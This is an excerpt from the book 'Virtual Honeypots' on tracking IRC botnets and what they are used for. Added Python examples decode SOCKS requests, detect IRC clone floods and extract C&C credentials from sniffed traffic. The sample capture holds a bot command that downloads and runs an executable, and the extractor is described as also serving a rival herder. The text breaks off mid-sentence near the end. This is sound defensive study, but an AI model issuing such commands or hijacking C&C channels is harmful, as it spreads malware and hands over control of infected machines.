Virtual Honeypots: From Botnet Tracking to Intrusion Detection
The following is an excerpt from the book
Virtual Honeypots: From Botnet Tracking to Intrusion Detection. In this section of Chapter 11: Tracking Botnets (.pdf), authors Niels Provos and Thorsten Holz explain how virtual honeypots can be used in the real world to investigate botnets and their behavior.
Something that is interesting but rarely seen is botnet owners discussing issues in their bot channel. We observed several such conversations and learned more about their social life this way. The bot-herders often discuss botnet-related issues, but they also talk about other computer crime-related matters or simply about what they do. Our observations showed that botnets are often run by young males with surprisingly limited programming skills. These people often achieve a good spread of their bots, but their actions are more or less harmless. Nevertheless, we also observed some more advanced attackers, but these persons joined the control channel only occasionally. They use only one-character nicks, issue a command, and leave. The updates of the bots they run are very professional. Probably these people use the botnets commercially and sell the services. More and more attackers use their botnets for financial gain: for example, by installing browser extensions they are able to track or fool web surfers, click pop-ups in an automated way, or post adware, as presented in the previous section. A small percentage of bot-herders seem highly skilled. They strip down the software used to run the C&C server to a non-RFC-compliant daemon that does not even allow standard IRC clients to connect.
Moreover, the data we captured while observing the botnets show that these control networks are used for more than just DDoS attacks. Possible uses of botnets can be categorized as listed here; since a botnet is nothing more than a tool, there are most likely other potential uses that we have not listed.
Spamming: Some bots offer the possibility to open a SOCKS v4/v5 proxy (a generic proxy protocol for TCP/IP-based networking applications) on a compromised machine. After enabling the SOCKS proxy, this machine can then be used for nefarious tasks such as sending bulk e-mail (spam) or phishing mails. With the help of a botnet and thousands of bots, an attacker is able to send massive amounts of spam. Some bots also implement a special function to harvest e-mail addresses from the victims. This can, of course, also be used to send phishing mails, since phishing is a special case of spam. So-called stock spam, the advertising of stocks in spam e-mails, is also increasing. In a study we were able to show that stock spam indeed influences financial markets.
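A sensor that exposes a SOCKS port sees the relay abuse described above in the very first bytes a bot sends, because a SOCKS request names the destination before any payload flows. The following decoder is an added example, not code from the book or from any bot: it parses SOCKS4, SOCKS4a and SOCKS5 greetings and CONNECT requests as a honeypot listener would capture them, and flags CONNECTs to SMTP ports. The sample requests, host names and addresses at the bottom are constructed for illustration.

```python
"""Decode the first bytes a client sends to a SOCKS listener.

Added example (not code from the book): a honeypot exposing a SOCKS port can
tell from the very first request where a bot is being pointed, and a flood of
CONNECTs to port 25 is the spam-relay pattern. The request bytes at the bottom
are constructed for illustration; the hosts and addresses in them are made up.
"""
import ipaddress
import struct

SOCKS_COMMANDS = {1: "CONNECT", 2: "BIND", 3: "UDP ASSOCIATE"}
SOCKS5_AUTH = {0: "no-auth", 1: "gssapi", 2: "username/password"}
MAIL_PORTS = {25, 465, 587}


def decode_socks4(data: bytes) -> dict:
    """SOCKS4 / SOCKS4a request: VN CD DSTPORT DSTIP USERID NUL [HOSTNAME NUL]."""
    if len(data) < 9:
        raise ValueError("short SOCKS4 request")
    cmd, port = data[1], struct.unpack("!H", data[2:4])[0]
    userid, _, rest = data[8:].partition(b"\x00")
    # SOCKS4a marks "resolve this name for me" with DSTIP = 0.0.0.x, x != 0.
    if data[4:7] == b"\x00\x00\x00" and data[7] != 0:
        host = rest.partition(b"\x00")[0].decode("latin-1")
    else:
        host = str(ipaddress.IPv4Address(data[4:8]))
    return {"version": 4, "command": SOCKS_COMMANDS.get(cmd, cmd),
            "host": host, "port": port, "userid": userid.decode("latin-1")}


def decode_socks5_greeting(data: bytes) -> dict:
    """SOCKS5 greeting: VER NMETHODS METHODS... (RFC 1928 section 3)."""
    nmethods = data[1]
    methods = data[2:2 + nmethods]
    return {"version": 5, "auth_methods": [SOCKS5_AUTH.get(m, m) for m in methods]}


def decode_socks5_request(data: bytes) -> dict:
    """SOCKS5 request: VER CMD RSV ATYP DST.ADDR DST.PORT (RFC 1928 section 4)."""
    if len(data) < 7 or data[2] != 0:
        raise ValueError("malformed SOCKS5 request")
    cmd, atyp = data[1], data[3]
    if atyp == 1:                       # IPv4 address
        host, off = str(ipaddress.IPv4Address(data[4:8])), 8
    elif atyp == 3:                     # length-prefixed domain name
        n = data[4]
        host, off = data[5:5 + n].decode("latin-1"), 5 + n
    elif atyp == 4:                     # IPv6 address
        host, off = str(ipaddress.IPv6Address(data[4:20])), 20
    else:
        raise ValueError(f"unknown address type {atyp}")
    port = struct.unpack("!H", data[off:off + 2])[0]
    return {"version": 5, "command": SOCKS_COMMANDS.get(cmd, cmd), "host": host, "port": port}


def decode_socks(data: bytes) -> dict:
    """Dispatch on the version byte; a v5 greeting is exactly 2 + NMETHODS bytes long."""
    if not data:
        raise ValueError("empty request")
    if data[0] == 4:
        return decode_socks4(data)
    if data[0] == 5:
        if len(data) >= 2 and len(data) == 2 + data[1]:
            return decode_socks5_greeting(data)
        return decode_socks5_request(data)
    raise ValueError(f"not a SOCKS request (first byte {data[0]:#04x})")


def is_mail_relay_attempt(req: dict) -> bool:
    """A CONNECT to an SMTP port through a freshly opened proxy is the spam pattern."""
    return req.get("command") == "CONNECT" and req.get("port") in MAIL_PORTS


# Constructed sample requests, as a SOCKS honeypot might capture them.
SAMPLE_REQUESTS = {
    "socks4_connect": b"\x04\x01\x00\x19" + bytes([192, 0, 2, 25]) + b"bot\x00",
    "socks4a_connect": b"\x04\x01\x00\x19\x00\x00\x00\x01" + b"\x00" + b"mail.example.com\x00",
    "socks5_greeting": b"\x05\x02\x00\x02",
    "socks5_connect": b"\x05\x01\x00\x03" + bytes([14]) + b"mx.example.net" + b"\x00\x19",
}

if __name__ == "__main__":
    for name, raw in SAMPLE_REQUESTS.items():
        req = decode_socks(raw)
        print(name, req, "MAIL RELAY" if is_mail_relay_attempt(req) else "")
```

A honeypot that answers these requests with a success reply and then sinks the connection gets the full SMTP envelope and message body of each relayed spam, which is far more useful for tracking than the bare destination; the SOCKS4a branch matters because spam engines usually hand the proxy a host name rather than a resolved address.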
Spreading new malware: In many cases, botnets are used to spread new bots. This is very easy, since all bots implement mechanisms to download and execute a file via HTTP or FTP. Spreading an e-mail virus using a botnet is a very attractive option, too: a botnet with 10,000 hosts that acts as the starting base for the mail virus allows very fast spreading and thus causes more harm. The Witty worm, which attacked the ICQ protocol parsing implementation in Internet Security Systems (ISS) products, is suspected to have been initially launched by a botnet because some of the attacking hosts were not running any ISS services.
Installing advertisement add-ons and Browser Helper Objects (BHOs): Botnets can also be used to gain financial advantages. This works by setting up a fake website with some advertisements. The operator of this website negotiates a deal with some hosting companies that pay for clicks on advertisements. With the help of a botnet, these clicks can be automated so that a few thousand bots click on the pop-ups at once. This process can be further enhanced if the bot hijacks the start page of a compromised machine so that the clicks are executed each time the victim uses the browser.
Google AdSense abuse: A similar abuse is also possible with Google's AdSense program. AdSense offers companies the possibility to display Google advertisements on their own website and earn money this way. The company earns money from clicks on these ads, paid, for example, per 10,000 clicks in one month. An attacker can abuse this program by leveraging his botnet to click on these advertisements in an automated fashion and thus artificially increment the click counter. This kind of usage of botnets is relatively uncommon but not a bad idea from an attacker's perspective.
Attacking IRC networks: Botnets are also used for DDoS attacks against IRC networks. The so-called clone attack is especially popular among attackers. In this kind of attack, the controller orders each bot to connect a large number of clones to the victim's IRC network. The victim is overwhelmed by service requests from thousands of (cloned) bots.
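A clone attack has a simple signature on the victim's side: many sessions from one source address, opened in a burst. The detector below is an added example, not code from the book or from any IRC daemon; it runs two per-IP counters (concurrently open sessions and new connections inside a sliding window) over connection log lines. The one-event-per-line log format is an assumed one, and the sample lines are constructed; a real ircd logs differently, so the regular expression is the part to adapt.

```python
"""Flag clone floods in an IRC server's connection log.

Added example (not code from the book). The one-event-per-line log format
and the log lines below are constructed for illustration; real ircds log
differently, so adapt LOG_RE to your server.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<event>CONNECT|DISCONNECT) (?P<ip>\S+) nick=(?P<nick>\S+)$"
)

# Constructed sample: one ordinary user, one host bringing up six clones in
# four seconds, and a second host with two sessions that must stay under threshold.
SAMPLE_LOG = """\
2007-10-01T12:00:00 CONNECT 198.51.100.7 nick=alice
2007-10-01T12:00:03 CONNECT 203.0.113.44 nick=bot001
2007-10-01T12:00:03 CONNECT 203.0.113.44 nick=bot002
2007-10-01T12:00:04 CONNECT 203.0.113.44 nick=bot003
2007-10-01T12:00:05 CONNECT 192.0.2.20 nick=bob
2007-10-01T12:00:05 CONNECT 203.0.113.44 nick=bot004
2007-10-01T12:00:06 CONNECT 203.0.113.44 nick=bot005
2007-10-01T12:00:07 CONNECT 203.0.113.44 nick=bot006
2007-10-01T12:00:08 CONNECT 192.0.2.20 nick=bob_laptop
2007-10-01T12:00:09 DISCONNECT 198.51.100.7 nick=alice
this line is not an event and is skipped
"""


def parse_event(line: str):
    """Return (timestamp, event, ip, nick), or None for lines that do not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    return datetime.fromisoformat(m["ts"]), m["event"], m["ip"], m["nick"]


def detect_clones(lines, max_active=3, burst=5, window=timedelta(seconds=10)):
    """Return {ip: sorted reasons} for sources that look like clone floods.

    Two signals, either of which is enough: more than `max_active` sessions open
    from one IP at the same time, or at least `burst` new connections from one
    IP inside `window`. Both are plain per-IP counters, the same quantity an
    ircd's per-IP connection limit enforces in real time.
    """
    active = defaultdict(set)      # ip -> nicks currently connected
    recent = defaultdict(deque)    # ip -> connect timestamps inside the window
    alerts = defaultdict(set)
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        ts, event, ip, nick = ev
        if event == "DISCONNECT":
            active[ip].discard(nick)
            continue
        active[ip].add(nick)
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:     # drop connects that fell out of the window
            q.popleft()
        if len(active[ip]) > max_active:
            alerts[ip].add("active_connections")
        if len(q) >= burst:
            alerts[ip].add("connect_burst")
    return {ip: sorted(reasons) for ip, reasons in alerts.items()}


if __name__ == "__main__":
    for ip, reasons in detect_clones(SAMPLE_LOG.splitlines()).items():
        print(ip, ", ".join(reasons))
```

The thresholds are deliberately low for the sample; in production a NAT gateway or a shell host legitimately opens several sessions from one address, so treat hits as triage input and tune `max_active` to the real per-IP client cap the daemon enforces, which is the standard mitigation for exactly this attack.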
Manipulating online polls/games: Online polls and games are getting more and more attention, and it is rather easy to manipulate them with botnets. Since every bot has a distinct IP address, every vote will have the same credibility as a vote cast by a real person. Online games can be manipulated in a similar way. Currently we are aware of bots being used that way, and there is a chance that this will become more important in the future.
Sniffing traffic: Bots can also use a packet sniffer to watch for interesting
clear-text data passing by a compromised machine. The sniffers are mostly
used to retrieve sensitive information like usernames and passwords.
But the sniffed data can also contain other interesting information: If a
machine is compromised more than once and is also a member of more than one
botnet, the packet sniffing allows one to gather the key information of the other
botnet. Thus, it is possible to "steal" another botnet.
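The "key information" a sniffer picks up from a rival botnet is the same handful of fields a honeypot operator extracts when tracking one: server, server password, the bot's nick, the channel and its key, and the commands the herder types into the channel (the one-character nicks mentioned earlier). The parser below is an added example, not code from the book or from any bot: a minimal RFC 1459-style IRC line parser plus an extractor that walks a bot's cleartext session and collects those fields. The capture is constructed; the server name, nick, channel, key and the ".download"/".socks4" command syntax are assumptions for the example and are not taken from any particular bot family.

```python
"""Recover another botnet's C&C details from sniffed cleartext IRC.

Added example (not code from the book): a small RFC 1459-style line parser
and an extractor that pulls the server password, the bot's nick, the channel
it joins with its key, and the commands the herder issues in that channel.
The capture below is constructed; the server name, nick, channel, key and the
".download"/".socks4" command syntax are made up for the example.
"""
from __future__ import annotations

from dataclasses import dataclass, field


@dataclass
class IrcMessage:
    prefix: str | None
    command: str
    params: list[str]


def parse_irc_line(line: str) -> IrcMessage:
    """Split one line into [:prefix] command params [:trailing]."""
    line = line.rstrip("\r\n")
    if not line:
        raise ValueError("empty IRC line")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    # The trailing parameter starts with " :" and may itself contain spaces.
    head, sep, trailing = line.partition(" :")
    words = head.split()
    if not words:
        raise ValueError("IRC line without a command")
    params = words[1:] + ([trailing] if sep else [])
    return IrcMessage(prefix, words[0].upper(), params)


@dataclass
class CncProfile:
    server: str | None = None
    server_password: str | None = None
    nick: str | None = None
    channels: dict[str, str | None] = field(default_factory=dict)   # channel -> key
    commands: list[tuple[str, str]] = field(default_factory=list)    # (sender nick, text)


def extract_cnc(lines) -> CncProfile:
    """Walk a bot's cleartext session (both directions) and collect what a
    rival herder, or a tracking honeypot, needs to join the channel."""
    profile = CncProfile()
    for raw in lines:
        if not raw.strip():
            continue
        msg = parse_irc_line(raw)
        if msg.command == "PASS" and msg.params:
            profile.server_password = msg.params[0]
        elif msg.command == "NICK" and msg.params:
            profile.nick = msg.params[0]
        elif msg.command == "001" and msg.prefix:        # RPL_WELCOME names the server
            profile.server = msg.prefix
        elif msg.command == "JOIN" and msg.params:
            # JOIN takes comma-separated channel and key lists; the server's echo
            # of the JOIN carries no key, so never overwrite a key already seen.
            chans = msg.params[0].split(",")
            keys = msg.params[1].split(",") if len(msg.params) > 1 else []
            for i, chan in enumerate(chans):
                key = keys[i] if i < len(keys) else None
                profile.channels[chan] = key or profile.channels.get(chan)
        elif (msg.command == "PRIVMSG" and len(msg.params) >= 2
              and msg.params[0] in profile.channels):
            sender = (msg.prefix or "").split("!", 1)[0]
            profile.commands.append((sender, msg.params[1]))
    return profile


# Constructed sample of what a sniffer on a doubly compromised host would see.
SAMPLE_CAPTURE = """\
PASS letmein
NICK [USA|XP]123456
USER x x x :x
:irc.example.invalid 001 [USA|XP]123456 :Welcome to the network
JOIN #bots s3cr3tkey
:[USA|XP]123456!x@10.0.0.5 JOIN :#bots
:x!herder@10.0.0.9 PRIVMSG #bots :.download http://192.0.2.10/update.exe 1
:x!herder@10.0.0.9 PRIVMSG #bots :.socks4 1080
"""

if __name__ == "__main__":
    print(extract_cnc(SAMPLE_CAPTURE.splitlines()))
```

Everything the extractor needs is in the first few packets of the session, which is why one cleartext IRC C&C is enough to give away a whole botnet, and why the stripped-down, non-RFC-compliant daemons of the more skilled herders mentioned earlier are a countermeasure: a parser like this one, and a standard client, will choke on their dialect.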
Keylogging: If the compromised machine uses encrypted communication
channels (e.g., HTTPS or POP3S), then just sniffing the network packets on
the victim's computer is useless, since the appropriate key to decrypt the
packets is missing. But most bots also implement functions to log keystrokes.
With the help of a keylogger, it is very easy for an attacker to retrieve sensitive information. A filtering mechanism (e.g., "I am only interested in key sequences near the keyword 'paypal.com'") further helps in stealing secret data.
Harvesting of information: Sometimes we can also observe the harvesting of information
from all compromised machines. With the help of special commands,
the operator of the botnet can request a list of sensitive information from
With our method we can shut down the root cause of all of these types of
nuisances, and hence the preceding methodology can not only be used to combat
To find out how the authors were able to make such observations about botnet behavior, read all of Chapter 11: Tracking Botnets (.pdf)
Reproduced from the book
Virtual Honeypots: From Botnet Tracking to Intrusion Detection. Copyright Addison Wesley Professional. Reproduced by permission of Pearson Education, Inc., 800 East 96th Street, Indianapolis, IN 46240. Written permission from Pearson Education, Inc. is required for all other users.
This was first published in October 2007